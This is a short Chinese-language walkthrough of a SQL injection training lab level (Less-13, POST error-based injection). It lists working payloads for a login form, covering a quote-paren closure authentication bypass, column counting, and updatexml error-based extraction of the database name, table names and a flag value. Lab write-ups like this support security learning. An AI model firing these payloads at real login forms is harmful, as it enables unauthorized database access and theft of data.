Less-13

Less-13 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)

1.判断是否存在注入

uname=a'&passwd=a&submit=Submit

错误回显 => 存在注入

2.判断参数类型

uname=1 or 1=1#&passwd=a&submit=Submit

无回显

uname=1' or 1=1#&passwd=a&submit=Submit

错误回显 => 字符型

 3.进行参数闭合

uname=1') or 1=1#&passwd=a&submit=Submit

登录成功

uname=1') or 1=2#&passwd=a&submit=Submit

登录失败 => 闭合成功

4.查看这个网站后台数据库所在的表有几列

uname=1') order by 2#&passwd=a&submit=Submit

无回显

uname=1') order by 3#&passwd=a&submit=Submit

错误回显 => 有2列

5.使用报错注入，查询数据库

uname=1') and updatexml(1,concat(0x7e,(select database()),0x7e),1) #&passwd=a&submit=Submit

7.查看数据库的表

uname=1') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #&passwd=a&submit=Submit

8.查看sPI5qPTd表中的列

uname=1') and updatexml(1,concat(0x7e,(select flag from sPI5qPTd limit 3,1),0x7e),1) #&passwd=a&submit=Submit